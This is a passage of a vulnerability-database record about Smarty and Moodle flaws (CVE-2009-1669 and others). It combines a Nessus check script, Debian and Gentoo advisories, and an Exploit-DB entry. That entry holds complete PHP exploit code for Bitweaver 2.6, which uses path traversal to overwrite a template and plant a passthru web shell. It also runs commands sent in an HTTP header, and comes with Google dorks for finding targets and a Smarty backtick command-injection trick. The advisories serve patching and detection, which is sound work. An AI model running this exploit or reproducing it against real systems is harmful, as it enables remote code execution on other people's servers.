\"CVE-2008-5432\", \"CVE-2008-5619\", \"CVE-2008-6124\", \"CVE-2009-0499\", \"CVE-2009-0500\", \"CVE-2009-0501\", \"CVE-2009-0502\", \"CVE-2009-1171\", \"CVE-2009-1669\");\n script_bugtraq_id(31862, 31887, 32402, 32799, 33610, 33612, 34278, 34918);\n script_xref(name:\"USN\", value:\"791-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 8.10 : moodle vulnerabilities (USN-791-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Thor Larholm discovered that PHPMailer, as used by Moodle, did not\ncorrectly escape email addresses. A local attacker with direct access\nto the Moodle database could exploit this to execute arbitrary\ncommands as the web server user. (CVE-2007-3215)\n\nNigel McNie discovered that fetching https URLs did not correctly\nescape shell meta-characters. An authenticated remote attacker could\nexecute arbitrary commands as the web server user, if curl was\ninstalled and configured. (CVE-2008-4796, MSA-09-0003)\n\nIt was discovered that Smarty (also included in Moodle), did not\ncorrectly filter certain inputs. An authenticated remote attacker\ncould exploit this to execute arbitrary PHP commands as the web server\nuser. (CVE-2008-4810, CVE-2008-4811, CVE-2009-1669)\n\nIt was discovered that the unused SpellChecker extension in Moodle did\nnot correctly handle temporary files. If the tool had been locally\nmodified, it could be made to overwrite arbitrary local files via\nsymlinks. (CVE-2008-5153)\n\nMike Churchward discovered that Moodle did not correctly filter Wiki\npage titles in certain areas. An authenticated remote attacker could\nexploit this to cause cross-site scripting (XSS), which could be used\nto modify or steal confidential data of other users within the same\nweb domain. (CVE-2008-5432, MSA-08-0022)\n\nIt was discovered that the HTML sanitizer, 'Login as' feature, and\nlogging in Moodle did not correctly handle certain inputs. An\nauthenticated remote attacker could exploit this to generate XSS,\nwhich could be used to modify or steal confidential data of other\nusers within the same web domain. (CVE-2008-5619, CVE-2009-0500,\nCVE-2009-0502, MSA-08-0026, MSA-09-0004, MSA-09-0007)\n\nIt was discovered that the HotPot module in Moodle did not correctly\nfilter SQL inputs. An authenticated remote attacker could execute\narbitrary SQL commands as the moodle database user, leading to a loss\nof privacy or denial of service. (CVE-2008-6124, MSA-08-0010)\n\nKevin Madura discovered that the forum actions and messaging settings\nin Moodle were not protected from cross-site request forgery (CSRF).\nIf an authenticated user were tricked into visiting a malicious\nwebsite while logged into Moodle, a remote attacker could change the\nuser's configurations or forum content. (CVE-2009-0499, MSA-09-0008,\nMSA-08-0023)\n\nDaniel Cabezas discovered that Moodle would leak usernames from the\nCalendar Export tool. A remote attacker could gather a list of users,\nleading to a loss of privacy. (CVE-2009-0501, MSA-09-0006)\n\nChristian Eibl discovered that the TeX filter in Moodle allowed any\nfunction to be used. An authenticated remote attacker could post a\nspecially crafted TeX formula to execute arbitrary TeX functions,\npotentially reading any file accessible to the web server user,\nleading to a loss of privacy. (CVE-2009-1171, MSA-09-0009)\n\nJohannes Kuhn discovered that Moodle did not correctly validate user\npermissions when attempting to switch user accounts. An authenticated\nremote attacker could switch to any other Moodle user, leading to a\nloss of privacy. (MSA-08-0003)\n\nHanno Boeck discovered that unconfigured Moodle instances contained\nXSS vulnerabilities. An unauthenticated remote attacker could exploit\nthis to modify or steal confidential data of other users within the\nsame web domain. (MSA-08-0004)\n\nDebbie McDonald, Mauno Korpelainen, Howard Miller, and Juan Segarra\nMontesinos discovered that when users were deleted from Moodle, their\nprofiles and avatars were still visible. An authenticated remote\nattacker could exploit this to store information in profiles even\nafter they were removed, leading to spam traffic. (MSA-08-0015,\nMSA-09-0001, MSA-09-0002)\n\nLars Vogdt discovered that Moodle did not correctly filter certain\ninputs. An authenticated remote attacker could exploit this to\ngenerate XSS from which they could modify or steal confidential data\nof other users within the same web domain. (MSA-08-0021)\n\nIt was discovered that Moodle did not correctly filter inputs for\ngroup creation, mnet, essay question, HOST param, wiki param, and\nothers. An authenticated remote attacker could exploit this to\ngenerate XSS from which they could modify or steal confidential data\nof other users within the same web domain. (MDL-9288, MDL-11759,\nMDL-12079, MDL-12793, MDL-14806)\n\nIt was discovered that Moodle did not correctly filter SQL inputs when\nperforming a restore. An attacker authenticated as a Moodle\nadministrator could execute arbitrary SQL commands as the moodle\ndatabase user, leading to a loss of privacy or denial of service.\n(MDL-11857).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/791-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Roundcube 0.2beta RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 59, 79, 89, 94, 264, 352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2021 Canonical, Inc. / NASL script (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|8\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 8.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"moodle\", pkgver:\"1.8.2-1ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"moodle\", pkgver:\"1.8.2-1.2ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:21:50", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4810", "CVE-2009-1669"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1919-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nOctober 25, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : smarty\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-4810 CVE-2009-1669\nDebian Bug : 504328 529810\n\nSeveral remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-4810\n\n The _expand_quoted_text function allows for certain restrictions in\n templates, like function calling and PHP execution, to be bypassed.\n\nCVE-2009-1669\n\n The smarty_function_math function allows context-dependent attackers\n to execute arbitrary commands via shell metacharacters in the equation\n attribute of the math function.\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 2.6.14-1etch2.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.20-1.2.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your smarty package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.14-1etch2.dsc\n Size/MD5 checksum: 958 f061c466cef93df89e677aeb72101910\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.14.orig.tar.gz\n Size/MD5 checksum: 144986 9186796ddbc29191306338dea9d632a0\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.14-1etch2.diff.gz\n Size/MD5 checksum: 4290 0ef9a669c127818f5ff084e2829738e9\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.14-1etch2_all.deb\n Size/MD5 checksum: 183300 d0ac954aad344f20b5933b09593b2968\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20-1.2.dsc\n Size/MD5 checksum: 1409 f280e2733ef52ff621891f99b26386f3\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20-1.2.diff.gz\n Size/MD5 checksum: 4876 4d729d18d7efe68e1ce3023149436c01\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20.orig.tar.gz\n Size/MD5 checksum: 158091 35f405b2418a26a895302a2ce5bf89d2\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20-1.2_all.deb\n Size/MD5 checksum: 204412 1e8e85b298b97176359dd15731e0dc88\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2009-10-25T16:25:10", "published": "2009-10-25T16:25:10", "id": "DEBIAN:DSA-1919-1:C1894", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00242.html", "title": "[SECURITY] [DSA 1919-1] New smarty packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:19", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4810", "CVE-2009-1669"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1919-2 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nAugust 17, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : smarty\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-4810 CVE-2009-1669\nDebian Bug : 504328 529810\n\nA regression was found in the patch applied in DSA 1919-1 to smarty,\nwhich caused compilation failures on some specific templates. This\nupdate corrects the fix. For reference, the full advisory text below.\n\nSeveral remote vulnerabilities have been discovered in Smarty, a PHP\ntemplating engine. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-4810\n\n The _expand_quoted_text function allows for certain restrictions in\n templates, like function calling and PHP execution, to be bypassed.\n\nCVE-2009-1669\n\n The smarty_function_math function allows context-dependent attackers\n to execute arbitrary commands via shell metacharacters in the equation\n attribute of the math function.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.6.20-1.3.\n\nThe testing (squeeze) and unstable distribution (sid) are not affected\nby this regression.\n\nWe recommend that you upgrade your smarty package.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20.orig.tar.gz\n Size/MD5 checksum: 158091 35f405b2418a26a895302a2ce5bf89d2\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20-1.3.diff.gz\n Size/MD5 checksum: 4861 fa15219470bdf157e4ccf0d20e6df918\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20-1.3.dsc\n Size/MD5 checksum: 1410 bdcbd684b08f012832e99a68b33b2bc7\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/s/smarty/smarty_2.6.20-1.3_all.deb\n Size/MD5 checksum: 204244 aef92eaf06b3bc912717fc0fcf27de53\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2010-08-17T20:47:24", "published": "2010-08-17T20:47:24", "id": "DEBIAN:DSA-1919-2:73FE7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00138.html", "title": "[SECURITY] [DSA 1919-2] New smarty packages fix regression", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T07:52:04", "description": "Bitweaver <= 2.6 saveFeed() Remote Code Execution Exploit. CVE-2009-1669,CVE-2009-1677,CVE-2009-1678. Webapps exploit for php platform", "published": "2009-05-12T00:00:00", "type": "exploitdb", "title": "Bitweaver <= 2.6 saveFeed Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1678", "CVE-2009-1677", "CVE-2009-1669"], "modified": "2009-05-12T00:00:00", "id": "EDB-ID:8659", "href": "https://www.exploit-db.com/exploits/8659/", "sourceData": "<?php\n /*\n Bitweaver <= 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit\n by Nine:Situations:Group::bookoo\n \n php.ini independent\n \n site: http://retrogod.altervista.org/\n software site: http://www.bitweaver.org/\n \n You need an user account and you need to change your \"display name\" in:\n \n {php}passthru($_SERVER[HTTP_CMD]);{/php}\n \n Register and click on Preferences, look at the \"User Information\" tab, inside the\n \"Real name\" text field write the code above, then click on Change.\n \n Google dorks:\n \"by bitweaver\" Version powered +boards\n \"You are running bitweaver in TEST mode\"|\"bitweaver * White Screen of Death\"\n \n Versions tested: 2.6.0, 2.0.2\n \n Vulnerability type: folder creation, file creation, file overwrite, PHP code injection.\n \n Explaination:\n look at /boards/boards_rss.php, line 102:\n ...\n echo $rss->saveFeed( $rss_version_name, $cacheFile );\n ...\n \n it calls saveFeed() function in an insecure way, arguments are built on\n $_REQUEST[version] var and may contain directory traversal sequences...\n \n now look at saveFeed() function in /rss/feedcreator.class.php\n \n ...\n function saveFeed($filename=\"\", $displayContents=true) {\n if ($filename==\"\") {\n $filename = $this->_generateFilename();\n }\n if ( !is_dir( dirname( $filename ))) {\n mkdir_p( dirname( $filename ));\n }\n $feedFile = fopen($filename, \"w+\");\n if ($feedFile) {\n fputs($feedFile,$this->createFeed());\n fclose($feedFile);\n if ($displayContents) {\n $this->_redirect($filename);\n }\n } else {\n echo \"<br /><b>Error creating feed file, please check write permissions.</b><br />\";\n }\n }\n \n }\n ...\n \n regardless of php.ini settings, you can create arbitrary folders, create/overwrite\n files, also you can end the path with an arbitrary extension, other than .xml passing\n a null char.\n ex.\n \n http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../bookoo.php%00\n \n now you have a bookoo.php in main folder:\n \n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <!-- generator=\"FeedCreator 1.7.2\" -->\n <?xml-stylesheet href=\"http://www.w3.org/2000/08/w3c-synd/style.css\" type=\"text/css\"?>\n <rss version=\"0.91\">\n <channel>\n <title> Feed</title>\n <description></description>\n <link>http://192.168.0.1</link>\n <lastBuildDate>Sat, 09 May 2009 20:01:44 +0100</lastBuildDate>\n <generator>FeedCreator 1.7.2</generator>\n <language>en-us</language>\n </channel>\n </rss>\n \n You could inject php code by the Host header (but this is used to build filenames and\n create problems, also most of servers will respond with an http error) inside link tag\n or by your \"display name\" in title tag, ex.:\n \n http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../bookoo_ii.php%00&u=bookoo&p=password\n \n and here it is the new file (if your display name is \"<?php passthru($_GET[cmd]; ?>\"):\n \n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <!-- generator=\"FeedCreator 1.7.2\" -->\n <?xml-stylesheet href=\"http://www.w3.org/2000/08/w3c-synd/style.css\" type=\"text/css\"?>\n <rss version=\"0.91\">\n <channel>\n <title> Feed (<?php passthru($_GET[cmd]; ?>))</title>\n <description></description>\n <link>http://192.168.0.1</link>\n <lastBuildDate>Tue, 12 May 2009 00:30:54 +0100</lastBuildDate>\n <generator>FeedCreator 1.7.2</generator>\n <language>en-us</language>\n </channel>\n </rss>\n \n if short_open_tag in php.ini is off (because of \"<?xml ...\" preamble\n generating a parse error with short_open_tag = on), you can now launch commands:\n \n http://host/path_to_bitweaver/bookoo_ii.php?cmd=ls\n \n However, to bypass short_open_tag = on you can inject in a template file, ex.:\n \n http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../themes/templates/footer_inc.tpl%00&u=bookoo&p=password\n \n Now footer_inc.tpl looks like this:\n \n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <!-- generator=\"FeedCreator 1.7.2\" -->\n <?xml-stylesheet href=\"http://www.w3.org/2000/08/w3c-synd/style.css\" type=\"text/css\"?>\n <rss version=\"0.91\">\n <channel>\n <title> Feed ({php}passthru($_GET[CMD]);{/php})</title>\n <description></description>\n <link>http://192.168.0.1</link>\n <lastBuildDate>Tue, 12 May 2009 00:43:01 +0100</lastBuildDate>\n <generator>FeedCreator 1.7.2</generator>\n <language>en-us</language>\n </channel>\n </rss>\n \n note that the shellcode is in Smarty template syntax ...\n \n Now you can launch commands from the main page:\n \n http://host/path_to_bitweaver/index.php?cmd=ls%20-la\n \n or\n \n http://host/path_to_bitweaver/wiki/index.php?cmd=ls%20-la\n \n Additional notes:\n \n Without to have an account you can create a denial of service condition, ex. by replacing the main index.php:\n \n http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../index.php%00\n \n I found also a bug in Smarty template system, against windows servers you can launch commands\n with this:\n \n {math equation=\"`^C^A^L^C`\"}\n \n They filtered non-math functions, but they forgot php bacticks operators. This is\n the same of launch exec() !\n \n */\n $err[0] = \"[!] This script is intended to be launched from the cli!\";\n $err[1] = \"[!] You need the curl extesion loaded!\";\n \n if (php_sapi_name() <> \"cli\") {\n die($err[0]);\n }\n if (!extension_loaded('curl')) {\n $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :\n false;\n if ($win) {\n !dl(\"php_curl.dll\") ? die($err[1]) :\n nil;\n } else {\n !dl(\"php_curl.so\") ? die($err[1]) :\n nil;\n }\n }\n \n function syntax() {\n print (\n \"Syntax: php \".$argv[0].\" [host] [path] [user] [pass] [cmd] [options] \\n\". \"Options: \\n\". \"--port:[port] - specify a port \\n\". \" default->80 \\n\". \"--proxy:[host:port] - use proxy \\n\". \"Examples: php \".$argv[0].\" 192.168.0.1 /bitweaver/ bookoo pass ls \\n\". \" php \".$argv[0].\" 192.168.0.1 / bookoo pass ls -a --proxy:1.1.1.1:8080\\n\". \" php \".$argv[0].\" 192.168.0.1 / bookoo pass cat ../kernel/config_inc.php --port:81\");\n die();\n }\n \n \n error_reporting(E_ALL);\n $host = $argv[1];\n $path = $argv[2];\n $_usr = $argv[3];\n $_pwd = $argv[4];\n $_cmd = \"\";\n for ($i = 5; $i < $argc; $i++) {\n if ((!strstr($argv[$i], \"--proxy:\")) and (!strstr($argv[$i], \"--port:\"))) {\n $_cmd .= \" \".$argv[$i];\n }\n }\n $argv[5] ? print(\"[*] Command->$_cmd\\n\") :\n syntax();\n $_use_proxy = false;\n $port = 80;\n \n for ($i = 3; $i < $argc; $i++) {\n if (stristr($argv[$i], \"--proxy:\")) {\n $_use_proxy = true;\n $tmp = explode(\":\", $argv[$i]);\n $proxy_host = $tmp[1];\n $proxy_port = (int)$tmp[2];\n }\n if (stristr($argv[$i], \"--port:\")) {\n $tmp = explode(\":\", $argv[$i]);\n $port = (int)$tmp[1];\n }\n }\n \n function _s($url, $cmd, $is_post, $request) {\n global $_use_proxy, $proxy_host, $proxy_port, $cookie;\n $ch = curl_init();\n curl_setopt($ch, CURLOPT_URL, $url);\n if ($is_post) {\n curl_setopt($ch, CURLOPT_POST, 1);\n curl_setopt($ch, CURLOPT_POSTFIELDS, $request.\"\\r\\n\");\n }\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n curl_setopt($ch, CURLOPT_USERAGENT, \"Googlebot/1.0 (googlebot@googlebot.com http://googlebot.com/)\");\n curl_setopt($ch, CURLOPT_TIMEOUT, 0);\n curl_setopt($ch, CURLOPT_HEADER, 1);\n $headers = array(\"Cookie: $cookie\", \"Cmd: \".$cmd.\" > ./../readme\");\n curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\n \n if ($_use_proxy) {\n curl_setopt($ch, CURLOPT_PROXY, $proxy_host.\":\".$proxy_port);\n }\n $_d = curl_exec($ch);\n if (curl_errno($ch)) {\n die(\"[!] \".curl_error($ch).\"\\n\");\n } else {\n curl_close($ch);\n }\n return $_d;\n }\n \n $my_template = \"themes/templates/footer_inc.tpl\";\n $url = \"http://$host:$port\".$path.\"boards/boards_rss.php\";\n $_o = _s($url, \"\", 0, \"\");\n if (stristr($_o, \"404 Not Found\")) {\n die (\"[!] Vulnerable script not found!\\n\");\n }\n //catch site cookie, this is needed for version compatibility, not needed in 2.6.0\n $_tmp = explode(\"Set-Cookie: \", $_o);\n $cookie = \"\";\n for ($i = 1; $i < count($_tmp); $i++) {\n $_tmpii = explode(\";\", $_tmp[$i]);\n $cookie .= $_tmpii[0].\"; \";\n }\n print(\"[*] Cookie->\".$cookie.\"\\n\");\n $_o = _s($url, \"\", 1, \"version=/\\x00&\");\n $_o = _s($url, \"\", 1, \"u=$_usr&p=$_pwd&version=/../../../../$my_template\\x00&\");\n if (stristr($_o, \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\")) {\n print (\"[*] '$my_template' successfully overwritten!\\n\");\n } else {\n print($_o);\n die(\"[!] Error! No write permission on /\".$my_template.\" ...\");\n }\n if (stristr($_o, \"{php}passthru(\\$_SERVER[HTTP_CMD]);{/php}\")) {\n print (\"[*] Shell injected!\\n\");\n } else {\n print($_o);\n die(\"[!] Error! Shell not injected!\");\n }\n $url = \"http://$host:$port\".$path.\"wiki/index.php\";\n $_o = _s($url, $_cmd, 0, \"\");\n $url = \"http://$host:$port\".$path.\"readme\";\n $_o = _s($url, \"\", 0, \"\");\n if (stristr($_o, \"404 Not Found\")) {\n die (\"[!] stdout file not found!\\n\");\n } else {\n print(\"[*] Success!\\n\".$_o);\n }\n?>\n\n# milw0rm.com [2009-05-12]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8659/"}], "gentoo": [{"lastseen": "2016-09-06T19:46:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4811", "CVE-2008-4810", "CVE-2008-1066", "CVE-2009-1669"], "edition": 1, "description": "### Background\n\nSmarty is a template engine for PHP. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Smarty: \n\n * The vendor reported that the modifier.regex_replace.php plug-in contains an input sanitation flaw related to the ASCII NUL character (CVE-2008-1066).\n * The vendor reported that the _expand_quoted_text() function in libs/Smarty_Compiler.class.php contains an input sanitation flaw via multiple vectors (CVE-2008-4810, CVE-2008-4811).\n * Nine:Situations:Group::bookoo reported that the smarty_function_math() function in libs/plugins/function.math.php contains input sanitation flaw (CVE-2009-1669).\n\n### Impact\n\nThese issues might allow a remote attacker to execute arbitrary PHP code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Smarty users should upgrade to an unaffected version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/smarty-2.6.23\"\n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are available since June 2, 2009. It is likely that your system is already no longer affected by this issue.", "modified": "2010-06-02T00:00:00", "published": "2010-06-02T00:00:00", "id": "GLSA-201006-13", "href": "https://security.gentoo.org/glsa/201006-13", "type": "gentoo", "title": "Smarty: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
